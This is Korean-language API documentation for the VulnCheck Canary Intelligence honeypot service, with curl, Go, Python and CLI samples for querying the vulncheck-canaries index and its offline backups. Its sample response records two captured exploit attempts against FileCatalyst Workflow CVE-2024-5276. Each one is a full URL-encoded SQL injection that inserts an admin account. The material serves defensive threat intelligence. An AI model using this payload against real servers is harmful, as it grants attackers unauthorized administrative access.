VulnCheck Canary Intelligence는 인터넷 전반에 실제 취약한 시스템을 구축하여 실제 공격자의 행동과 악용 기법을 실시간으로 포착합니다. 이 데이터는 어떤 취약점이 표적이 되고 있는지, 그리고 누가 어떻게 악용하는지를 보여줍니다. 이를 통해 방어자에게 조기에 실행 가능한 정보를 제공합니다.
VulnCheck API를 사용하면 VulnCheck Canary Intelligence를 쉽게 시작할 수 있습니다. 시작하려면 다음과 같이 /v3/index/:index?cve=:cve API를 통해 vulncheck-canaries 인덱스를 쿼리하기만 하면 됩니다.
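# Query the vulncheck-canaries index for CVE-2024-5276.
# The URL is quoted so the shell does not treat "?" as a glob character, and the
# token is read from VULNCHECK_API_TOKEN (the variable the Go sample uses) so the
# literal token stays out of shell history and saved scripts.
curl --request GET \
  --url 'https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276' \
  --header 'Accept: application/json' \
  --header "Authorization: Bearer ${VULNCHECK_API_TOKEN:?VULNCHECK_API_TOKEN is not set}"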
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
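// main queries the vulncheck-canaries index for CVE-2024-5276 and prints the
// returned records as indented JSON.
func main() {
	// Read the token from the environment so it is not hard-coded in the source;
	// fail early with a clear message instead of sending an empty key.
	token := os.Getenv("VULNCHECK_API_TOKEN")
	if token == "" {
		log.Fatal("VULNCHECK_API_TOKEN is not set")
	}

	configuration := vulncheck.NewConfiguration()
	configuration.Scheme = "https"
	configuration.Host = "api.vulncheck.com"
	client := vulncheck.NewAPIClient(configuration)

	// Attach the token to the request context under the "Bearer" entry of
	// vulncheck.ContextAPIKeys.
	auth := context.WithValue(
		context.Background(),
		vulncheck.ContextAPIKeys,
		map[string]vulncheck.APIKey{
			"Bearer": {Key: token},
		},
	)

	resp, httpRes, err := client.IndicesAPI.IndexVulncheckCanariesGet(auth).Cve("CVE-2024-5276").Execute()
	if err != nil {
		log.Fatalf("querying vulncheck-canaries: %v", err)
	}
	// Report the status separately: with a nil err the original message would
	// have been just "<nil>".
	if httpRes.StatusCode != 200 {
		log.Fatalf("querying vulncheck-canaries: unexpected HTTP status %d", httpRes.StatusCode)
	}

	// The records carry attacker-supplied request data (see http.url and
	// http_user_agent in the sample response); treat the output as untrusted
	// input when passing it to other tools.
	prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
	if err != nil {
		log.Fatalf("Failed to generate JSON: %v", err)
	}
	fmt.Println(string(prettyJSON))
}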
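import os

import vulncheck_sdk

# Read the token from the environment (the same variable the Go sample uses)
# instead of hard-coding it in the script.
token = os.environ.get("VULNCHECK_API_TOKEN")
if not token:
    raise SystemExit("VULNCHECK_API_TOKEN is not set")

configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
configuration.api_key["Bearer"] = token

with vulncheck_sdk.ApiClient(configuration) as api_client:
    indices_client = vulncheck_sdk.IndicesApi(api_client)
    # Fetch the canary detections recorded for CVE-2024-5276.
    api_response = indices_client.index_vulncheck_canaries_get(cve="CVE-2024-5276")
    print(api_response.data)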
# Same query through the vulncheck CLI: browse the vulncheck-canaries index,
# filtered to CVE-2024-5276.
vulncheck index browse vulncheck-canaries --cve CVE-2024-5276
위의 예에서는 vulncheck-canaries 인덱스에서 CVE-2024-5276에 대한 정보를 검색합니다.
유효한 CVE 식별자를 사용하여 /v3/index/vulncheck-canaries?cve=:cve API 엔드포인트를 호출하면 아래와 유사한 응답이 반환됩니다.
{
"_benchmark": 0.039542,
"_meta": {
"timestamp": "2025-10-22T11:35:36.982964726Z",
"index": "vulncheck-canaries",
// ...
},
"data": [
{
"src_ip": "34.133.225.171",
"src_port": 58376,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2024-5276",
"signature_id": 12700349,
"signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
"category": "Web Application Attack",
"severity": 1,
"http": {
"url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734cm3xr2dqiauaium96hrrzwmbd%27%2C+NULL%2C+%27986347D9E41AEE0835C341ED7DCA8B65%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdFirstName%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734cm3xr2dqiauaium96hrrzwmbd%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
"http_user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-17T18:32:24.338Z"
},
{
"src_ip": "34.16.7.161",
"src_port": 48334,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2024-5276",
"signature_id": 12700349,
"signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
"category": "Web Application Attack",
"severity": 1,
"http": {
"url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734ckkpr2kyqyslshjzytmsobunu%27%2C+NULL%2C+%277CE0027ED69C7ECA40D38289F18C6036%27%2C+%2734ckkpr2kyqyslshjzytmsobunuFirstName%27%2C+%2734ckkpr2kyqyslshjzytmsobunuLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734ckkpr2kyqyslshjzytmsobunu%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
"http_user_agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-17T18:17:55.908Z"
}
]
}
VulnCheck Canary Intelligence는 광범위한 사용 사례를 지원합니다.
API 쿼리 매개변수 두 개(CVE와 날짜)를 결합하면 특정 날짜에 악용되고 있는 CVE를 빠르게 파악할 수 있습니다.
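# Query the vulncheck-canaries index for CVE-2024-5276 on 2025-10-17.
# The URL must be quoted: an unquoted "&" ends the curl command and runs it in the
# background, so the date filter and both headers would never reach curl.
# The token is read from VULNCHECK_API_TOKEN (the variable the Go sample uses) so
# the literal token stays out of shell history and saved scripts.
curl --request GET \
  --url 'https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276&date=2025-10-17' \
  --header 'Accept: application/json' \
  --header "Authorization: Bearer ${VULNCHECK_API_TOKEN:?VULNCHECK_API_TOKEN is not set}"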
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
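// main queries the vulncheck-canaries index for CVE-2024-5276 on 2025-10-17
// and prints the returned records as indented JSON.
func main() {
	// Read the token from the environment so it is not hard-coded in the source;
	// fail early with a clear message instead of sending an empty key.
	token := os.Getenv("VULNCHECK_API_TOKEN")
	if token == "" {
		log.Fatal("VULNCHECK_API_TOKEN is not set")
	}

	configuration := vulncheck.NewConfiguration()
	configuration.Scheme = "https"
	configuration.Host = "api.vulncheck.com"
	client := vulncheck.NewAPIClient(configuration)

	// Attach the token to the request context under the "Bearer" entry of
	// vulncheck.ContextAPIKeys.
	auth := context.WithValue(
		context.Background(),
		vulncheck.ContextAPIKeys,
		map[string]vulncheck.APIKey{
			"Bearer": {Key: token},
		},
	)

	// Combine the CVE and date filters in one request.
	resp, httpRes, err := client.IndicesAPI.IndexVulncheckCanariesGet(auth).Cve("CVE-2024-5276").Date("2025-10-17").Execute()
	if err != nil {
		log.Fatalf("querying vulncheck-canaries: %v", err)
	}
	// Report the status separately: with a nil err the original message would
	// have been just "<nil>".
	if httpRes.StatusCode != 200 {
		log.Fatalf("querying vulncheck-canaries: unexpected HTTP status %d", httpRes.StatusCode)
	}

	// The records carry attacker-supplied request data (see http.url and
	// http_user_agent in the sample response); treat the output as untrusted
	// input when passing it to other tools.
	prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
	if err != nil {
		log.Fatalf("Failed to generate JSON: %v", err)
	}
	fmt.Println(string(prettyJSON))
}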
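import os

import vulncheck_sdk

# Read the token from the environment (the same variable the Go sample uses)
# instead of hard-coding it in the script.
token = os.environ.get("VULNCHECK_API_TOKEN")
if not token:
    raise SystemExit("VULNCHECK_API_TOKEN is not set")

configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
configuration.api_key["Bearer"] = token

with vulncheck_sdk.ApiClient(configuration) as api_client:
    indices_client = vulncheck_sdk.IndicesApi(api_client)
    # Combine the CVE and date filters in one request.
    api_response = indices_client.index_vulncheck_canaries_get(cve="CVE-2024-5276", date="2025-10-17")
    print(api_response)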
# Same query through the vulncheck CLI: browse the vulncheck-canaries index,
# filtered to CVE-2024-5276 and the date 2025-10-17.
vulncheck index browse vulncheck-canaries --cve CVE-2024-5276 --date 2025-10-17
VulnCheck Canary Intelligence를 사용하면 다양한 API 쿼리 매개변수를 사용하여 Canary 데이터 세트를 쉽게 쿼리할 수 있으며, 이는 결과 필터링에 유용합니다. 지원되는 API 쿼리 매개변수는 다음과 같습니다.
| 쿼리 매개변수 | 설명 |
|---|---|
| cve | CVE ID 기반 필터링 |
| src_country | 소스 국가에서 발생한 공격을 기준으로 필터링 |
| dst_country | 목적지 국가를 향한 공격을 기준으로 필터링 |
| date | YYYY-MM-DD 형식의 공격 날짜 기반 필터링 |
| src_ip | 공격의 소스 IP 주소 기반 필터링 |
| src_asn | AS12345 형식의 공격 소스 ASN 기반 필터링 |
| 오프라인 백업 | 설명 |
|---|---|
| vulncheck-canaries-3d | 지난 3일간의 Canary Intelligence 탐지 |
| vulncheck-canaries-10d | 지난 10일간의 Canary Intelligence 탐지 |
| vulncheck-canaries-30d | 지난 30일간의 Canary Intelligence 탐지 |
| vulncheck-canaries-90d | 지난 90일간의 Canary Intelligence 탐지 |
특정 오프라인 백업을 요청하려면 다음과 같이 /v3/backup/:index를 호출하면 됩니다(아래 예시는 vulncheck-canaries-3d를 요청합니다).
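# Request the vulncheck-canaries-3d offline backup.
# The token is read from VULNCHECK_API_TOKEN (the variable the Go sample uses) so
# the literal token stays out of shell history and saved scripts.
curl --request GET \
  --url 'https://api.vulncheck.com/v3/backup/vulncheck-canaries-3d' \
  --header 'Accept: application/json' \
  --header "Authorization: Bearer ${VULNCHECK_API_TOKEN:?VULNCHECK_API_TOKEN is not set}"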
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
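// main requests the vulncheck-canaries-3d offline backup and prints the
// response data as indented JSON.
func main() {
	// Read the token from the environment so it is not hard-coded in the source;
	// fail early with a clear message instead of sending an empty key.
	token := os.Getenv("VULNCHECK_API_TOKEN")
	if token == "" {
		log.Fatal("VULNCHECK_API_TOKEN is not set")
	}

	configuration := vulncheck.NewConfiguration()
	configuration.Scheme = "https"
	configuration.Host = "api.vulncheck.com"
	client := vulncheck.NewAPIClient(configuration)

	// Attach the token to the request context under the "Bearer" entry of
	// vulncheck.ContextAPIKeys.
	auth := context.WithValue(
		context.Background(),
		vulncheck.ContextAPIKeys,
		map[string]vulncheck.APIKey{
			"Bearer": {Key: token},
		},
	)

	resp, httpRes, err := client.EndpointsAPI.BackupIndexGet(auth, "vulncheck-canaries-3d").Execute()
	if err != nil {
		log.Fatalf("requesting backup vulncheck-canaries-3d: %v", err)
	}
	// Report the status separately: with a nil err the original message would
	// have been just "<nil>".
	if httpRes.StatusCode != 200 {
		log.Fatalf("requesting backup vulncheck-canaries-3d: unexpected HTTP status %d", httpRes.StatusCode)
	}

	// NOTE(review): the Python sample prints data[0].url, so resp.Data presumably
	// holds download links rather than the detections themselves; confirm.
	prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
	if err != nil {
		log.Fatalf("Failed to generate JSON: %v", err)
	}
	fmt.Println(string(prettyJSON))
}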
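import os

import vulncheck_sdk

# Read the token from the environment (the same variable the Go sample uses)
# instead of hard-coding it in the script.
token = os.environ.get("VULNCHECK_API_TOKEN")
if not token:
    raise SystemExit("VULNCHECK_API_TOKEN is not set")

configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
configuration.api_key["Bearer"] = token

with vulncheck_sdk.ApiClient(configuration) as api_client:
    endpoints_client = vulncheck_sdk.EndpointsApi(api_client)
    # Request the vulncheck-canaries-3d backup and print the url field of the
    # first entry in the response data.
    api_response = endpoints_client.backup_index_get("vulncheck-canaries-3d")
    print(api_response.data[0].url)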
# Download the vulncheck-canaries-3d offline backup with the vulncheck CLI.
vulncheck backup download vulncheck-canaries-3d